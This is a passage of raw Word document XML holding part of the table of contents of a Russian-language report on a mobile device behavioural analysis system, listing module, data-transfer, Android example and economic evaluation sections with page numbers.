                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505554 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>47</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55" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.6.7</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Модуль уведомлений</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505555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56" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.6.8</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Модуль разрешений</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505556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57" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.6.9</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Модуль файлов</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505557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58" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.7</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Модуль логирования</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505558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59" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.8</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Передача данных на сервер</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505559 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>48</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60" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.9</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Обработка полученных данных</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505560 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>49</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00007DA5" w:rsidRDefault="00F870DF">
          <w:pPr>
            <w:pStyle w:val="23"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1100"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9344"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc61505561" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.10</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Передача данных на клиентское приложение</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505561 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>49</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00007DA5" w:rsidRDefault="00F870DF">
          <w:pPr>
            <w:pStyle w:val="23"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1100"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9344"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc61505562" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.11</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Использование системы поведенческого анализа мобильных устройств</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505562 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>50</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00007DA5" w:rsidRDefault="00F870DF">
          <w:pPr>
            <w:pStyle w:val="23"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1100"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9344"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc61505563" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.12</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Примеры работы сервиса поведенческого анализа МПУ на ОС андроид</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505563 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>51</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00007DA5" w:rsidRDefault="00F870DF">
          <w:pPr>
            <w:pStyle w:val="23"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1100"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9344"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc61505564" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.13</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Выводы третьего раздела</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505564 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>57</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00007DA5" w:rsidRDefault="00F870DF">
          <w:pPr>
            <w:pStyle w:val="15"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="560"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9344"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc61505565" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ЭКОНОМИЧЕСКАЯ ОЦЕНКА ПРОЕКТА</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505565 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>58</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66" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Определение списка работ и состава исполнителей</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505566 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>58</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67" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Расчет продолжительности и трудоемкости работ</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505567 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>59</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68" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.3</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Планирование разработки программного обеспечения с построением диаграммы Ганта</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505568 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>63</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69" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Расчет экономической эффективности</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505569 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>64</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70" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
